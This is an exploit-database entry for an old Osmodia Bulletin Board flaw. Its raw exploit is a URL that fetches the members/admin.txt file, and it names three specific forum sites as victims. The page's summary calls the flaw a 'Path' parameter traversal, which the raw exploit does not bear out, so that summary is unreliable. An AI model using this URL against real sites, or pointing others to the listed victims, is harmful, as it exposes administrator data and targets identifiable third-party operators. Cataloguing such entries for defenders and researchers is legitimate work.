header-logo
Suggest Exploit
vendor:
Bulletin Board
by:
Pouya_Server
7.5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Bulletin Board
Affected Version From: All Version
Affected Version To: All Version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Osmodia Bulletin Board All Version Xpl

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'Path' parameter of the 'members/admin.txt' script. A remote attacker can gain access to arbitrary files on the vulnerable system.

Mitigation:

Input validation should be used to prevent path traversal attacks.
Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Osmodia Bulletin Board
Version : All Version
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Website: http://Pouya-Server.ir
---------------------------------------------------------
#########################################################
[Xpl]:
http://site/[Path]/members/admin.txt
------------------------------------------
Victem :
http://www.a4-freunde.de/foren
http://www.kirk1980.de/abiboard
http://www.autothieme.de/forum
---------------------------------------------------------
#########################################################

# milw0rm.com [2009-02-20]